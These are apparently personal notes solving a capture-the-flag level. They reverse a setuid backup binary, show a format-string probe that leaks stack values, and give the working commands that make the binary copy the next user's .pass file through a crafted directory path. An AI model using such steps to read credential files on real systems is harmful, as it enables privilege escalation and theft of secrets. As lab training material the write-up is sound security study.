/*************************/
/*  P R O T E C T I O N  */
/*************************/

- FULL RELRO (can't overwrite got.plt)
- Canary found (can't buffer overflow)



/*******************/
/*  R E V E R S E  */
/*******************/

- need 1 arg
- open /backups/.log
- logwrapper(FILE(.log), "Starting back up: ", argv[1])
	- stcrpy(buff[264], "Starting back ...")
	- calcul length input 2 times(uVar4, uVar3)
	- snprintf(buff + len(Starting ...), 254 - len(argv[1], argv[1] (format %p, %s)) <- can leak stack and		maybe format string exploitation
	./level08 "AAAAAAAA%p%p%p%p%p%p%p%p%p%p"
	LOG: Starting back up: AAAAAAAA0xffffffffffffffec0xec0x400d6c0xffffffffffffffff0x7fffffffe8db0x400d960x6030100x676e6974726174530x7075206b636162200x414141414141203a
	- fprintf the buff in file (.log)		
	
- open argv[1]
- fill "./backups/" in buff[104]
- strncat(buff[104], argv[1], 99 - 11)
- open(buff[104], 0xc1 (WR,CREAT,EXECL), 0x1b0(730) open buffer ?
- copies les chars du fichier argv[1] dans buff[104]
- "Finished back up"-> argv[1]
  
argv[1] -> copied in a buffer 

	
-> create file system, unix will resolve it 
mkdir -p backups/home/users/level09/
-> exec and it linux file system will resolve "./backups//home/..."
/home/users/level08/level08 /home/users/level09/.pass
-> .pass copied

